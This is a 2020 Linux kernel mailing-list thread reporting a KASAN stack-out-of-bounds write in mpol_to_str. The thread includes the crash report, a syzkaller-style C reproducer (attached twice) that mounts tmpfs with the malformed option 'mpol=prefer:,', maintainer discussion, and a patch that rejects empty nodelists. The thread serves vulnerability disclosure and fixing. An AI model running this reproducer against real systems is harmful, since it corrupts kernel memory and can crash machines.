* KASAN: stack-out-of-bounds Write in mpol_to_str
@ 2020-03-15 19:57 Entropy Moe
2020-03-16 18:46 ` Randy Dunlap
2020-03-26 0:45 ` [PATCH] mm: mempolicy: require at least one nodeid for MPOL_PREFERRED Randy Dunlap
0 siblings, 2 replies; 6+ messages in thread
From: Entropy Moe @ 2020-03-15 19:57 UTC (permalink / raw)
To: linux-kernel, linux-mm, akpm
[-- Attachment #1.1: Type: text/plain, Size: 237 bytes --]
Hello team,
how are you ?
I wanted to report a bug on mempolicy.c. I found the bug on the latest
version of the kernel.
which is stack out of bound vulnerability.
I am attaching report.
If you need the POC crash code, I can provide.
[-- Attachment #1.2: Type: text/html, Size: 390 bytes --]
[-- Attachment #2: mpol_to_str.txt --]
[-- Type: text/plain, Size: 3127 bytes --]
==================================================================
BUG: KASAN: stack-out-of-bounds in set_bit include/asm-generic/bitops/instrumented-atomic.h:28 [inline]
BUG: KASAN: stack-out-of-bounds in __node_set include/linux/nodemask.h:130 [inline]
BUG: KASAN: stack-out-of-bounds in mpol_to_str+0x2b9/0x380 mm/mempolicy.c:2962
Write of size 8 at addr ffff88806715fb58 by task systemd/1
CPU: 1 PID: 1 Comm: systemd Not tainted 5.6.0-rc3 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
Call Trace:
__dump_stack lib/dump_stack.c:77 [inline]
dump_stack+0xc6/0x11e lib/dump_stack.c:118
print_address_description.constprop.5+0x16/0x310 mm/kasan/report.c:374
__kasan_report+0x158/0x1c0 mm/kasan/report.c:506
kasan_report+0xe/0x20 mm/kasan/common.c:641
check_memory_region_inline mm/kasan/generic.c:185 [inline]
check_memory_region+0x15d/0x1b0 mm/kasan/generic.c:192
set_bit include/asm-generic/bitops/instrumented-atomic.h:28 [inline]
__node_set include/linux/nodemask.h:130 [inline]
mpol_to_str+0x2b9/0x380 mm/mempolicy.c:2962
shmem_show_mpol mm/shmem.c:1406 [inline]
shmem_show_options+0x37c/0x540 mm/shmem.c:3611
show_mountinfo+0x5b4/0x870 fs/proc_namespace.c:187
seq_read+0x9fb/0x1030 fs/seq_file.c:268
__vfs_read+0x7a/0x100 fs/read_write.c:425
vfs_read+0x15e/0x370 fs/read_write.c:461
ksys_read+0x17b/0x210 fs/read_write.c:587
do_syscall_64+0x9b/0x520 arch/x86/entry/common.c:294
entry_SYSCALL_64_after_hwframe+0x49/0xbe
RIP: 0033:0x7f67a589a910
Code: b6 fe ff ff 48 8d 3d 0f be 08 00 48 83 ec 08 e8 06 db 01 00 66 0f 1f 44 00 00 83 3d f9 2d 2c 00 00 75 10 b8 00 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 de 9b 01 00 48 89 04 24
RSP: 002b:00007ffefbf89888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
RAX: ffffffffffffffda RBX: 000055b4a3ba9c00 RCX: 00007f67a589a910
RDX: 0000000000000400 RSI: 000055b4a3bba200 RDI: 0000000000000013
RBP: 0000000000000d68 R08: 00007f67a72cf500 R09: 00000000000000e0
R10: 000055b4a3bba5e3 R11: 0000000000000246 R12: 00007f67a5b55440
R13: 00007f67a5b54900 R14: 000000000000001d R15: 0000000000000000
The buggy address belongs to the page:
page:ffffea00019c57c0 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0
flags: 0x100000000000000()
raw: 0100000000000000 ffffea00019c57c8 ffffea00019c57c8 0000000000000000
raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000
page dumped because: kasan: bad access detected
addr ffff88806715fb58 is located in stack of task systemd/1 at offset 40 in frame:
mpol_to_str+0x0/0x380 mm/mempolicy.c:2926
this frame has 1 object:
[32, 40) 'nodes'
Memory state around the buggy address:
ffff88806715fa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ffff88806715fa80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
>ffff88806715fb00: 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 00
^
ffff88806715fb80: 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00
ffff88806715fc00: 00 00 00 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00
==================================================================
^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: KASAN: stack-out-of-bounds Write in mpol_to_str 2020-03-15 19:57 KASAN: stack-out-of-bounds Write in mpol_to_str Entropy Moe @ 2020-03-16 18:46 ` Randy Dunlap 2020-03-20 8:36 ` Entropy Moe 2020-03-26 0:45 ` [PATCH] mm: mempolicy: require at least one nodeid for MPOL_PREFERRED Randy Dunlap 1 sibling, 1 reply; 6+ messages in thread From: Randy Dunlap @ 2020-03-16 18:46 UTC (permalink / raw) To: Entropy Moe, linux-kernel, linux-mm, akpm On 3/15/20 12:57 PM, Entropy Moe wrote: > Hello team, > how are you ? > I wanted to report a bug on mempolicy.c. I found the bug on the latest version of the kernel. > > which is stack out of bound vulnerability. > > I am attaching report. > > If you need the POC crash code, I can provide. Hi Moe, Please post the POC code and your kernel .config file. thanks. -- ~Randy ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: KASAN: stack-out-of-bounds Write in mpol_to_str 2020-03-16 18:46 ` Randy Dunlap @ 2020-03-20 8:36 ` Entropy Moe 2020-03-21 6:45 ` Andrew Morton 2020-03-26 0:54 ` Randy Dunlap 0 siblings, 2 replies; 6+ messages in thread From: Entropy Moe @ 2020-03-20 8:36 UTC (permalink / raw) To: Randy Dunlap; +Cc: linux-kernel, linux-mm, akpm [-- Attachment #1.1: Type: text/plain, Size: 555 bytes --] Hello Randy, please see attached POC for the vulnerability. On Mon, Mar 16, 2020 at 10:46 PM Randy Dunlap <rdunlap@infradead.org> wrote: > On 3/15/20 12:57 PM, Entropy Moe wrote: > > Hello team, > > how are you ? > > I wanted to report a bug on mempolicy.c. I found the bug on the latest > version of the kernel. > > > > which is stack out of bound vulnerability. > > > > I am attaching report. > > > > If you need the POC crash code, I can provide. > > Hi Moe, > > Please post the POC code and your kernel .config file. > > thanks. > -- > ~Randy > > [-- Attachment #1.2: Type: text/html, Size: 972 bytes --] [-- Attachment #2: mpol_to_string_poc.c --] [-- Type: text/x-csrc, Size: 3515 bytes --] #define _GNU_SOURCE #include <endian.h> #include <errno.h> #include <fcntl.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mount.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #include <linux/loop.h> static unsigned long long procid; struct fs_image_segment { void* data; uintptr_t size; uintptr_t offset; }; #define IMAGE_MAX_SEGMENTS 4096 #define IMAGE_MAX_SIZE (129 << 20) #define sys_memfd_create 319 static unsigned long fs_image_segment_check(unsigned long size, unsigned long nsegs, long segments) { unsigned long i; struct fs_image_segment* segs = (struct fs_image_segment*)segments; if (nsegs > IMAGE_MAX_SEGMENTS) nsegs = IMAGE_MAX_SEGMENTS; for (i = 0; i < nsegs; i++) { if (segs[i].size > IMAGE_MAX_SIZE) segs[i].size = IMAGE_MAX_SIZE; segs[i].offset %= IMAGE_MAX_SIZE; if (segs[i].offset > IMAGE_MAX_SIZE - segs[i].size) segs[i].offset = IMAGE_MAX_SIZE - segs[i].size; if (size < segs[i].offset + segs[i].offset) size = segs[i].offset + segs[i].offset; } if (size > IMAGE_MAX_SIZE) size = IMAGE_MAX_SIZE; return size; } static long syz_mount_image(volatile long fsarg, volatile long dir, volatile unsigned long size, volatile unsigned long nsegs, volatile long segments, volatile long flags, volatile long optsarg) { char loopname[64], fs[32], opts[256]; int loopfd, err = 0, res = -1; unsigned long i; size = fs_image_segment_check(size, nsegs, segments); int memfd = syscall(sys_memfd_create, "syz_mount_image", 0); if (memfd == -1) { err = errno; goto error; } if (ftruncate(memfd, size)) { err = errno; goto error_close_memfd; } for (i = 0; i < nsegs; i++) { struct fs_image_segment* segs = (struct fs_image_segment*)segments; int res1 = 0; res1 = pwrite(memfd, segs[i].data, segs[i].size, segs[i].offset); if (res1 < 0) { } } snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid); loopfd = open(loopname, O_RDWR); if (loopfd == -1) { err = errno; goto error_close_memfd; } if (ioctl(loopfd, LOOP_SET_FD, memfd)) { if (errno != EBUSY) { err = errno; goto error_close_loop; } ioctl(loopfd, LOOP_CLR_FD, 0); usleep(1000); if (ioctl(loopfd, LOOP_SET_FD, memfd)) { err = errno; goto error_close_loop; } } mkdir((char*)dir, 0777); memset(fs, 0, sizeof(fs)); strncpy(fs, (char*)fsarg, sizeof(fs) - 1); memset(opts, 0, sizeof(opts)); strncpy(opts, (char*)optsarg, sizeof(opts) - 32); if (strcmp(fs, "iso9660") == 0) { flags |= MS_RDONLY; } else if (strncmp(fs, "ext", 3) == 0) { if (strstr(opts, "errors=panic") || strstr(opts, "errors=remount-ro") == 0) strcat(opts, ",errors=continue"); } else if (strcmp(fs, "xfs") == 0) { strcat(opts, ",nouuid"); } if (mount(loopname, (char*)dir, fs, flags, opts)) { err = errno; goto error_clear_loop; } res = 0; error_clear_loop: ioctl(loopfd, LOOP_CLR_FD, 0); error_close_loop: close(loopfd); error_close_memfd: close(memfd); error: errno = err; return res; } int main(void) { syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 3ul, 0x32ul, -1, 0); memcpy((void*)0x20000000, "tmpfs\000", 6); memcpy((void*)0x20000100, "./file0\000", 8); memcpy((void*)0x20000340, "mpol", 4); *(uint8_t*)0x20000344 = 0x3d; memcpy((void*)0x20000345, "prefer", 6); *(uint8_t*)0x2000034b = 0x3a; *(uint8_t*)0x2000034c = 0x2c; *(uint8_t*)0x2000034d = 0; syz_mount_image(0x20000000, 0x20000100, 0, 0, 0, 0, 0x20000340); return 0; } [-- Attachment #3: mpol_to_string_poc.c --] [-- Type: text/x-csrc, Size: 3515 bytes --] #define _GNU_SOURCE #include <endian.h> #include <errno.h> #include <fcntl.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mount.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #include <linux/loop.h> static unsigned long long procid; struct fs_image_segment { void* data; uintptr_t size; uintptr_t offset; }; #define IMAGE_MAX_SEGMENTS 4096 #define IMAGE_MAX_SIZE (129 << 20) #define sys_memfd_create 319 static unsigned long fs_image_segment_check(unsigned long size, unsigned long nsegs, long segments) { unsigned long i; struct fs_image_segment* segs = (struct fs_image_segment*)segments; if (nsegs > IMAGE_MAX_SEGMENTS) nsegs = IMAGE_MAX_SEGMENTS; for (i = 0; i < nsegs; i++) { if (segs[i].size > IMAGE_MAX_SIZE) segs[i].size = IMAGE_MAX_SIZE; segs[i].offset %= IMAGE_MAX_SIZE; if (segs[i].offset > IMAGE_MAX_SIZE - segs[i].size) segs[i].offset = IMAGE_MAX_SIZE - segs[i].size; if (size < segs[i].offset + segs[i].offset) size = segs[i].offset + segs[i].offset; } if (size > IMAGE_MAX_SIZE) size = IMAGE_MAX_SIZE; return size; } static long syz_mount_image(volatile long fsarg, volatile long dir, volatile unsigned long size, volatile unsigned long nsegs, volatile long segments, volatile long flags, volatile long optsarg) { char loopname[64], fs[32], opts[256]; int loopfd, err = 0, res = -1; unsigned long i; size = fs_image_segment_check(size, nsegs, segments); int memfd = syscall(sys_memfd_create, "syz_mount_image", 0); if (memfd == -1) { err = errno; goto error; } if (ftruncate(memfd, size)) { err = errno; goto error_close_memfd; } for (i = 0; i < nsegs; i++) { struct fs_image_segment* segs = (struct fs_image_segment*)segments; int res1 = 0; res1 = pwrite(memfd, segs[i].data, segs[i].size, segs[i].offset); if (res1 < 0) { } } snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid); loopfd = open(loopname, O_RDWR); if (loopfd == -1) { err = errno; goto error_close_memfd; } if (ioctl(loopfd, LOOP_SET_FD, memfd)) { if (errno != EBUSY) { err = errno; goto error_close_loop; } ioctl(loopfd, LOOP_CLR_FD, 0); usleep(1000); if (ioctl(loopfd, LOOP_SET_FD, memfd)) { err = errno; goto error_close_loop; } } mkdir((char*)dir, 0777); memset(fs, 0, sizeof(fs)); strncpy(fs, (char*)fsarg, sizeof(fs) - 1); memset(opts, 0, sizeof(opts)); strncpy(opts, (char*)optsarg, sizeof(opts) - 32); if (strcmp(fs, "iso9660") == 0) { flags |= MS_RDONLY; } else if (strncmp(fs, "ext", 3) == 0) { if (strstr(opts, "errors=panic") || strstr(opts, "errors=remount-ro") == 0) strcat(opts, ",errors=continue"); } else if (strcmp(fs, "xfs") == 0) { strcat(opts, ",nouuid"); } if (mount(loopname, (char*)dir, fs, flags, opts)) { err = errno; goto error_clear_loop; } res = 0; error_clear_loop: ioctl(loopfd, LOOP_CLR_FD, 0); error_close_loop: close(loopfd); error_close_memfd: close(memfd); error: errno = err; return res; } int main(void) { syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 3ul, 0x32ul, -1, 0); memcpy((void*)0x20000000, "tmpfs\000", 6); memcpy((void*)0x20000100, "./file0\000", 8); memcpy((void*)0x20000340, "mpol", 4); *(uint8_t*)0x20000344 = 0x3d; memcpy((void*)0x20000345, "prefer", 6); *(uint8_t*)0x2000034b = 0x3a; *(uint8_t*)0x2000034c = 0x2c; *(uint8_t*)0x2000034d = 0; syz_mount_image(0x20000000, 0x20000100, 0, 0, 0, 0, 0x20000340); return 0; } ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: KASAN: stack-out-of-bounds Write in mpol_to_str 2020-03-20 8:36 ` Entropy Moe @ 2020-03-21 6:45 ` Andrew Morton 2020-03-26 0:54 ` Randy Dunlap 1 sibling, 0 replies; 6+ messages in thread From: Andrew Morton @ 2020-03-21 6:45 UTC (permalink / raw) To: Entropy Moe; +Cc: Randy Dunlap, linux-kernel, linux-mm On Fri, 20 Mar 2020 12:36:38 +0400 Entropy Moe <3ntr0py1337@gmail.com> wrote: > Hello Randy, > please see attached POC for the vulnerability. > Thanks. Ouch. afaict shmem's S_IFREG inode's mpol's preferred_node is messed up. I don't think anyone has worked on this code in a decade or more. Is someone up to taking a look please? > On Mon, Mar 16, 2020 at 10:46 PM Randy Dunlap <rdunlap@infradead.org> wrote: > > > On 3/15/20 12:57 PM, Entropy Moe wrote: > > > Hello team, > > > how are you ? > > > I wanted to report a bug on mempolicy.c. I found the bug on the latest > > version of the kernel. > > > > > > which is stack out of bound vulnerability. > > > > > > I am attaching report. > > > > > > If you need the POC crash code, I can provide. > > > > Hi Moe, > > > > Please post the POC code and your kernel .config file. > > > > thanks. > > -- > > ~Randy > > > > ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: KASAN: stack-out-of-bounds Write in mpol_to_str 2020-03-20 8:36 ` Entropy Moe 2020-03-21 6:45 ` Andrew Morton @ 2020-03-26 0:54 ` Randy Dunlap 1 sibling, 0 replies; 6+ messages in thread From: Randy Dunlap @ 2020-03-26 0:54 UTC (permalink / raw) To: Entropy Moe; +Cc: linux-kernel, linux-mm, akpm, Dmitry Vyukov On 3/20/20 1:36 AM, Entropy Moe wrote: > Hello Randy, > please see attached POC for the vulnerability. > Hi Moe, Do you have anything to do with the syzkaller source code generation? (POC; reproducers) I don't expect it to be beautiful, but it could be a lot easier to read in a few places. E.g., the POC that you provided sets a tmpfs mount option string to "mpol=prefer:,", which is probably purposely malformed (OK), but it does so in an unreadable manner: (I added the // comments.) memcpy((void*)0x20000340, "mpol", 4); *(uint8_t*)0x20000344 = 0x3d; // = memcpy((void*)0x20000345, "prefer", 6); *(uint8_t*)0x2000034b = 0x3a; // : *(uint8_t*)0x2000034c = 0x2c; // , *(uint8_t*)0x2000034d = 0; That kind of obfuscation just helps slow down debugging. :( -- ~Randy ^ permalink raw reply [flat|nested] 6+ messages in thread
* [PATCH] mm: mempolicy: require at least one nodeid for MPOL_PREFERRED 2020-03-15 19:57 KASAN: stack-out-of-bounds Write in mpol_to_str Entropy Moe 2020-03-16 18:46 ` Randy Dunlap @ 2020-03-26 0:45 ` Randy Dunlap 1 sibling, 0 replies; 6+ messages in thread From: Randy Dunlap @ 2020-03-26 0:45 UTC (permalink / raw) To: Entropy Moe, linux-kernel, linux-mm, akpm From: Randy Dunlap <rdunlap@infradead.org> Using an empty (malformed) nodelist that is not caught during mount option parsing leads to a stack-out-of-bounds access. The option string that was used was: "mpol=prefer:,". However, MPOL_PREFERRED requires a single node number, which is not being provided here. Add a check that 'nodes' is not empty after parsing for MPOL_PREFERRED's nodeid. Fixes: 095f1fc4ebf3 ("mempolicy: rework shmem mpol parsing and display") Reported-by: Entropy Moe <3ntr0py1337@gmail.com> Signed-off-by: Randy Dunlap <rdunlap@infradead.org> Cc: Andrew Morton <akpm@linux-foundation.org> Cc: linux-mm@kvack.org Cc: Lee Schermerhorn <lee.schermerhorn@hp.com> --- mm/mempolicy.c | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) --- lnx-56-rc6.orig/mm/mempolicy.c +++ lnx-56-rc6/mm/mempolicy.c @@ -2841,7 +2841,9 @@ int mpol_parse_str(char *str, struct mem switch (mode) { case MPOL_PREFERRED: /* - * Insist on a nodelist of one node only + * Insist on a nodelist of one node only, although later + * we use first_node(nodes) to grab a single node, so here + * nodelist (or nodes) cannot be empty. */ if (nodelist) { char *rest = nodelist; @@ -2849,6 +2851,8 @@ int mpol_parse_str(char *str, struct mem rest++; if (*rest) goto out; + if (nodes_empty(nodes)) + goto out; } break; case MPOL_INTERLEAVE: ^ permalink raw reply [flat|nested] 6+ messages in thread
end of thread, other threads:[~2020-03-26 0:54 UTC | newest] Thread overview: 6+ messages (download: mbox.gz / follow: Atom feed) -- links below jump to the message on this page -- 2020-03-15 19:57 KASAN: stack-out-of-bounds Write in mpol_to_str Entropy Moe 2020-03-16 18:46 ` Randy Dunlap 2020-03-20 8:36 ` Entropy Moe 2020-03-21 6:45 ` Andrew Morton 2020-03-26 0:54 ` Randy Dunlap 2020-03-26 0:45 ` [PATCH] mm: mempolicy: require at least one nodeid for MPOL_PREFERRED Randy Dunlap
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox; as well as URLs for NNTP newsgroup(s).